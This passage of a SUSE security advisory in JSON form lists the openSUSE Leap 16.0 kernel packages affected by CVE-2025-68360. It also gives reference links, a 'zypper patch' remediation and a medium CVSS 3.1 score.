"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68360",
"url": "https://www.suse.com/security/cve/CVE-2025-68360"
},
{
"category": "external",
"summary": "SUSE Bug 1255536 for CVE-2025-68360",
"url": "https://bugzilla.suse.com/1255536"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
